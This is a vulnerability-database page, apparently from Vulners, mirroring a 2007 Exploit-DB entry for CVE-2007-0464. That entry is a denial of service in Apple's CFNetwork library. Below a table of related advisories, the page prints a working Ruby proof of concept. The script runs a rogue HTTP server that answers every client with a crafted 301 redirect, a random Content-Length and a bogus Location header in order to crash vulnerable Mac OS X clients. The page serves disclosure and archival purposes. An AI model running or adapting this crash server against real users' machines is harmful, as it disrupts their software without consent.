Lucene search
+L

Apple CFNetwork - HTTP Response Denial of Service

🗓️ 25 Jan 2007 00:00:00Reported by MoABType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 50 Views

Apple CFNetwork HTTP Response Do

Related
Code
ReporterTitlePublishedViews
Family
nessus
Tenable Nessus
CFNetwork < 129.20 DoS
22 Jun 200700:00
nessus
nessus
Tenable Nessus
Mac OS X < 10.4.11 Multiple Vulnerabilities (Security Update 2007-008)
15 Nov 200700:00
nessus
nessus
Tenable Nessus
Mac OS X < 10.4.11 Multiple Vulnerabilities (Security Update 2007-008)
14 Nov 200700:00
nessus
cve
CVE
CVE-2007-0464
30 Jan 200717:00
cve
cvelist
Cvelist
CVE-2007-0464
30 Jan 200717:00
cvelist
nvd
NVD
CVE-2007-0464
30 Jan 200717:28
nvd
packetstorm
Packet Storm
MOAB-25-01-2007.rb.txt
27 Jan 200700:00
packetstorm
prion
Prion
Null pointer dereference
30 Jan 200717:28
prion
securityvulns
securityvulns
Mac OS X CFNetwork library DoS
29 Jan 200700:00
securityvulns
seebug
seebug.org
Apple CFNetwork HTTP空指针引用拒绝服务漏洞
17 Nov 200700:00
seebug
Rows per page
#!/usr/bin/ruby
# (c) Copyright 2007 Lance M. Havok <lmh [at] info-pull.com>
# Proof of concept for MOAB-25-01-2007.
#

require 'socket'

web_port = (ARGV[0] || 80).to_i

puts "++ Starting HTTP server at port #{web_port}."
web_server  = TCPServer.new(nil, web_port)
while (session = web_server.accept)
  rand_clen = rand(80)
  useragent = session.recvfrom(2000)[0].scan(/User-Agent: (.*)/).flatten[0].chomp!
  puts "++ Connected: #{useragent}"
  session.print "HTTP/1.1 301 OK\r\n"
  session.print "Content-Type: text/html\r\n"
  session.print "Content-Length: #{rand_clen}\r\n"
  session.print "Location: http://nonexistent123\r\n\r\n"
  session.print "X" * rand_clen
  session.close
end

# milw0rm.com [2007-01-25]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Jan 2007 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.14382
50